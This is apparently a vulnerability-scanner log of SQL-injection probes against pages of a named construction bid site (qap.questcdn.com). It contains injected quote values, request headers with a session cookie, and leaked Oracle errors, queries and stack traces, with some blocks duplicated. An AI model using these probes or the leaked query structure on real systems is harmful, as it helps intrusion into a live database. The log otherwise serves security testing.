<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Topeka - Projects</title><script type="text/javascript"><!-- function doDownload() { doLogin(); } function doLogin() { document.location = '/qap/projects/prj_browse/ipp_login.html?jobCategoryNo=1048445&member_no=&provider=453856&jobNo=%2527&caller=projects/prj_browse/ipp_prj_browse_f.html&caller_params=' + escape(document.location.search); } function doPlanHolders() { //window.open('/qap/projects/prj_add_mod/prj_plan_list.html?modifiable=FALSE&jobPK=%2527', '', 'height=650,width=650,scrollbars,resizable'); window.open('/qap/projects/planholder/planholder_list.html?modifiable=FALSE&jobPK=%2527', '', 'height=650,width=1100,scrollbars,resizable'); } function confirmPlanDl() { <font color="#FF0000">2011/03/01 14:06:28.579 [ 1] (TP-Processor1800) Problem including template component SQLLOOP query=" SELECT jt.name FROM jobs j, job_types jt WHERE jt.job_type_no = j.job_type_no AND j.job_no = <?p:jobNo?> " name="jt"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-00911: invalid character while executing: SELECT jt.name FROM jobs j, job_types jt WHERE jt.job_type_no = j.job_type_no AND j.job_no = %27 at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.parseExecuteDescribe(TTC7Protocol.java:830) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2391) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:110) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font> } function ShowProjectPreview(action) { window.open('/qap/action/showProjPreviewPage?JobPK=%2527&eca=showProjPreviewPage', '', 'height=600,width=700,scrollbars,resizable'); }// --></script></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td width="100%" height="100%" valign="top"> <div class="crumbtrail"><a href="/ipp/projects/prj_browse/ipp_prj_browse_f.html?3"><span class="arrow"><--</span>Return to last page</a></div> <form name="userdata" Action="/qap/action/ippLogin" Method="POST"> <input type="hidden" name="root_page" value="true"> <input type="hidden" name="provider" value="453856"> <input type="hidden" name="jobCategoryNo" value="1048445"> <input type="hidden" name="jobNo" value="%27"> <input type="hidden" name="loginPagePath" value="projects/prj_browse/ipp_prj_browse_f.html"> <input type="hidden" name="loginPageParams" value="3"> <h3>Login</h3> <p>Please use your QuestCDN.com Username & Password to log in:</p> <table width="300"> <tr> <td width="150">username:</td> <td width="150"><input type="text" name="username" size="24"></td> </tr> <tr> <td width="150">password:</td> <td width="150"><input type="password" name="password" size="24"></td> </tr> <tr> <td> </td> <td><input type="submit" value="Login"</input></td> </tr> <tr> <td width="115"></td> <td width="185"><a href="/qap/forgotPassword.html">Forgot Password?</a></td> </tr> </table><!-- <p>Not already a member of QuestCDN.com - click <a href="https://secure.questcdn.com/questcdn/subscribe/sub_form.html?root_page=true member_no="<?s:subscriberPK?>" jobCategoryNo="<?p:jobCategoryNo?>" jobNo="<?p:jobNo?>" provider="<?p:provider?>" ">JOIN</a> for your Free membership</p>--><!-- <p>Not already a member of QuestCDN.com - click <a href="https://qap.questcdn.com/qap/subscribe/sub_form.html?root_page=true download_type=plan jobCategoryNo=<?p:jobCategoryNo?> jobNo=<?p:jobNo?> member_no=<?s:subscriberPK?> provider=<?p:provider?>"<font color=red size=3 >JOIN</font></a> for your Free membership</p>--> <p>Not already a member of QuestCDN.com - click <a href="https://qap.questcdn.com/qap/subscribe/sub_form.html?root_page=true&download_type=plan&member_no=&jobCategoryNo=1048445&jobNo=%27&provider=453856"><font color=red size=3 >JOIN</font></a> for your Free membership</p </td></tr></table></body></html>
|
- /qap/action/IPPshowProjData
/qap/action/IPPshowProjData |
Parameters
| Parameter | Type | Value |
| jobCategoryNo | GET | 324403 |
| group | GET | 11 |
| provider | GET | %27 |
| sortType | GET | 0 |
| jobNo | GET | 1464405 |
Request
GET /qap/action/IPPshowProjData?jobCategoryNo=324403&group=11&provider=%2527&sortType=0&jobNo=1464405 HTTP/1.1
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 20:06:47 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:06:47 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 4246
Content-Type: text/html;charset=utf-8
<!--$Header: /home/cvsroot/ipp.questcdn.com/www/projects/prj_browse/ipp_prj_browse_f.html,v 1.4 2005/09/13 17:42:49 gkloke Exp $--><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><font color="#FF0000">2011/03/01 14:06:49.852 [ 1] (TP-Processor1917) Problem including template component SQLLOOP query=" SELECT ws.css_url, ws.html_header1, ws.html_footer, ws.html_leftside, ws.html_rightside, p.company_name, ws.html_header2, ws.html_header3 FROM IPP_Web_Styles ws, provider_web_styles pws, provider_accounts p WHERE ws.style_id = pws.style_id AND pws.provider_no = p.provider_no AND p.provider_no = <?p:provider.toSQLString()?> AND ws.application_context = '<?a:appContext?>' " name="sq"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-01722: invalid number while executing: SELECT ws.css_url, ws.html_header1, ws.html_footer, ws.html_leftside, ws.html_rightside, p.company_name, ws.html_header2, ws.html_header3 FROM IPP_Web_Styles ws, provider_web_styles pws, provider_accounts p WHERE ws.style_id = pws.style_id AND pws.provider_no = p.provider_no AND p.provider_no = '%27' AND ws.application_context = '/qap' at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.fetch(TTC7Protocol.java:1198) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2400) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font>
Date: Tue, 01 Mar 2011 20:06:47 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:06:47 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 4246
Content-Type: text/html;charset=utf-8
<!--$Header: /home/cvsroot/ipp.questcdn.com/www/projects/prj_browse/ipp_prj_browse_f.html,v 1.4 2005/09/13 17:42:49 gkloke Exp $--><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><font color="#FF0000">2011/03/01 14:06:49.852 [ 1] (TP-Processor1917) Problem including template component SQLLOOP query=" SELECT ws.css_url, ws.html_header1, ws.html_footer, ws.html_leftside, ws.html_rightside, p.company_name, ws.html_header2, ws.html_header3 FROM IPP_Web_Styles ws, provider_web_styles pws, provider_accounts p WHERE ws.style_id = pws.style_id AND pws.provider_no = p.provider_no AND p.provider_no = <?p:provider.toSQLString()?> AND ws.application_context = '<?a:appContext?>' " name="sq"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-01722: invalid number while executing: SELECT ws.css_url, ws.html_header1, ws.html_footer, ws.html_leftside, ws.html_rightside, p.company_name, ws.html_header2, ws.html_header3 FROM IPP_Web_Styles ws, provider_web_styles pws, provider_accounts p WHERE ws.style_id = pws.style_id AND pws.provider_no = p.provider_no AND p.provider_no = '%27' AND ws.application_context = '/qap' at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.fetch(TTC7Protocol.java:1198) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2400) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font>
|
- /qap/projects/prj_browse/ipp_prj_browse_letting_date.html
/qap/projects/prj_browse/ipp_prj_browse_letting_date.html |
Parameters
| Parameter | Type | Value |
| jobCategoryNo | GET | 03/03/2011 |
| group | GET | %27 |
| provider | GET | 765295 |
| sortType | GET | 1 |
Request
GET /qap/projects/prj_browse/ipp_prj_browse_letting_date.html?jobCategoryNo=03%2F03%2F2011&group=%2527&provider=765295&sortType=1 HTTP/1.1
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 20:06:46 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:06:49 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 9652
Content-Type: text/html;charset=utf-8
<!--$Header: /home/cvsroot/ipp.questcdn.com/www/projects/prj_browse/ipp_prj_browse_letting_date.html,v 1.4 2005/09/13 17:42:49 gkloke Exp $--><!-- webapps/ipp/projects/prj_browse/ipp_prj_browse_letting_date.html --><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Projects</title><link href="/qap//includes/ipp_bartlett_west.css" rel="stylesheet" media="screen"></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td><img src="/qap/images/bartlett_west.jpg" alt="Bartlett West"> </td></tr><tr> <td> <table class="menubar" cellpadding="0" cellspacing="0" width="100%"> <tr> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=%2527&provider=765295&sortType=1" >Browse Projects</a> </td> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=%2527&provider=765295&sortType=1" >Project Results</a> </td> <td> </td> </tr> <tr> <td class="menu_link" width="200"> <a href="/qap/projects/prj_browse/ipp_prj_browse.html?group=%2527&provider=765295" >Click Here To Sort By Category</a> </td> </tr> </table> </td></tr><tr><!--BGP1--> <td height="100%"> <table height="100%" cellpadding="0" cellspacing="0"> <tr> <td class="prj_tree" width="275" height="100%" valign="top"> <table width="244" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="20"> <td width="14" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="10" border="0"></td> <td width="20" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="20" border="0"></td> <td width="210" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="210" border="0"></td> </tr> <font color="#FF0000">2011/03/01 14:06:51.227 [ 1] (TP-Processor1898) Problem including template component SQLLOOP query=" SELECT TO_CHAR(j.bid_date,'MM/DD/YYYY'), COUNT(j.bid_date) n_projects FROM job_categories jc, jobs j, job_types jt, provider_group pg WHERE jc.job_category_no = j.job_category_no(+) AND j.job_type_no = jt.job_type_no (+) AND ( jt.name <> 'hidden' OR jt.name IS NULL ) AND j.bid_date >= SYSDATE AND ( j.provider_account_no = pg.provider_no OR j.q_ipp_owner = pg.provider_no ) AND pg.provider_group_no = <?p:group?> GROUP BY TO_CHAR(j.bid_date,'MM/DD/YYYY') ORDER BY TO_CHAR(j.bid_date,'MM/DD/YYYY') asc " name="q1"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-00911: invalid character while executing: SELECT TO_CHAR(j.bid_date,'MM/DD/YYYY'), COUNT(j.bid_date) n_projects FROM job_categories jc, jobs j, job_types jt, provider_group pg WHERE jc.job_category_no = j.job_category_no(+) AND j.job_type_no = jt.job_type_no (+) AND ( jt.name <> 'hidden' OR jt.name IS NULL ) AND j.bid_date >= SYSDATE AND ( j.provider_account_no = pg.provider_no OR j.q_ipp_owner = pg.provider_no ) AND pg.provider_group_no = %27 GROUP BY TO_CHAR(j.bid_date,'MM/DD/YYYY') ORDER BY TO_CHAR(j.bid_date,'MM/DD/YYYY') asc at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.parseExecuteDescribe(TTC7Protocol.java:830) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2391) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.IfComponent.includeInternal(IfComponent.java:126) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:110) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font> <tr> <td colspan="3"> </td> </tr> <tr> <td width="14"> </td> <td colspan="2" width="230"> <span class="copyright">© 1999-2010 Quest Construction Data Network, LLC</span> </td> </tr> <tr> <td colspan="3" height="100%"> </td> </tr> </table> </td><!--BGP5--> <td class="body" width="100%" height="100%" valign="top"> <h3>SEARCH PROJECTS</h3> <form name="frmSearch" action="/qap/action/IPPprojectSearch" method="post"> <input type="hidden" name="SearchType" value="1"> <input type="hidden" name="SQL" value=""> <input type="hidden" name="provider" value="765295"> <input type="hidden" name="group" value="%27"> <table width="590" border="0" cellspacing="0"> <tr> <td class="search_label" width="240">QuestCDN eBidDoc™ Number</td> <td class="search_label" width="240">Password (If Required)</td> <td width="100" class="bodygrn-bold"> </td> </tr> <tr> <td><input type="text" value="0" name="ProjectNo" size="23" style="font-family: Courier; font-size:14px" value=""></td> <td><input type="password" name="password" size="20" style="font-family: Courier; font-size:14px"></td> <td><a href="#" onclick="document.frmSearch.submit(); return false;">Search</a></td> </tr> <tr> <td colspan="2" class="body"> <table border="0" cellspacing="0" cellpadding="0" class="body"> <tr> <td style="line-height:5px"> </td> </tr> <tr> <td> Using the <b>QuestCDN eBidDoc™ Number</b> to access the project advertisement and plan documents is an easy task. Just enter the specific <b>QuestCDN eBidDoc™ Number</b> in the eBidDoc field above and click the 'Search' button. This will take you directly to the full text advertisement for that project. Don't forget to enter the password if you are trying to access a protected or hidden project! </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td></tr><tr> <td></ipp/includes/ipp_coon_rapids_footer.html> </td></tr></table></body></html>
Date: Tue, 01 Mar 2011 20:06:46 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:06:49 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 9652
Content-Type: text/html;charset=utf-8
<!--$Header: /home/cvsroot/ipp.questcdn.com/www/projects/prj_browse/ipp_prj_browse_letting_date.html,v 1.4 2005/09/13 17:42:49 gkloke Exp $--><!-- webapps/ipp/projects/prj_browse/ipp_prj_browse_letting_date.html --><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Projects</title><link href="/qap//includes/ipp_bartlett_west.css" rel="stylesheet" media="screen"></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td><img src="/qap/images/bartlett_west.jpg" alt="Bartlett West"> </td></tr><tr> <td> <table class="menubar" cellpadding="0" cellspacing="0" width="100%"> <tr> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=%2527&provider=765295&sortType=1" >Browse Projects</a> </td> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=%2527&provider=765295&sortType=1" >Project Results</a> </td> <td> </td> </tr> <tr> <td class="menu_link" width="200"> <a href="/qap/projects/prj_browse/ipp_prj_browse.html?group=%2527&provider=765295" >Click Here To Sort By Category</a> </td> </tr> </table> </td></tr><tr><!--BGP1--> <td height="100%"> <table height="100%" cellpadding="0" cellspacing="0"> <tr> <td class="prj_tree" width="275" height="100%" valign="top"> <table width="244" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="20"> <td width="14" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="10" border="0"></td> <td width="20" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="20" border="0"></td> <td width="210" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="210" border="0"></td> </tr> <font color="#FF0000">2011/03/01 14:06:51.227 [ 1] (TP-Processor1898) Problem including template component SQLLOOP query=" SELECT TO_CHAR(j.bid_date,'MM/DD/YYYY'), COUNT(j.bid_date) n_projects FROM job_categories jc, jobs j, job_types jt, provider_group pg WHERE jc.job_category_no = j.job_category_no(+) AND j.job_type_no = jt.job_type_no (+) AND ( jt.name <> 'hidden' OR jt.name IS NULL ) AND j.bid_date >= SYSDATE AND ( j.provider_account_no = pg.provider_no OR j.q_ipp_owner = pg.provider_no ) AND pg.provider_group_no = <?p:group?> GROUP BY TO_CHAR(j.bid_date,'MM/DD/YYYY') ORDER BY TO_CHAR(j.bid_date,'MM/DD/YYYY') asc " name="q1"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-00911: invalid character while executing: SELECT TO_CHAR(j.bid_date,'MM/DD/YYYY'), COUNT(j.bid_date) n_projects FROM job_categories jc, jobs j, job_types jt, provider_group pg WHERE jc.job_category_no = j.job_category_no(+) AND j.job_type_no = jt.job_type_no (+) AND ( jt.name <> 'hidden' OR jt.name IS NULL ) AND j.bid_date >= SYSDATE AND ( j.provider_account_no = pg.provider_no OR j.q_ipp_owner = pg.provider_no ) AND pg.provider_group_no = %27 GROUP BY TO_CHAR(j.bid_date,'MM/DD/YYYY') ORDER BY TO_CHAR(j.bid_date,'MM/DD/YYYY') asc at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.parseExecuteDescribe(TTC7Protocol.java:830) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2391) at 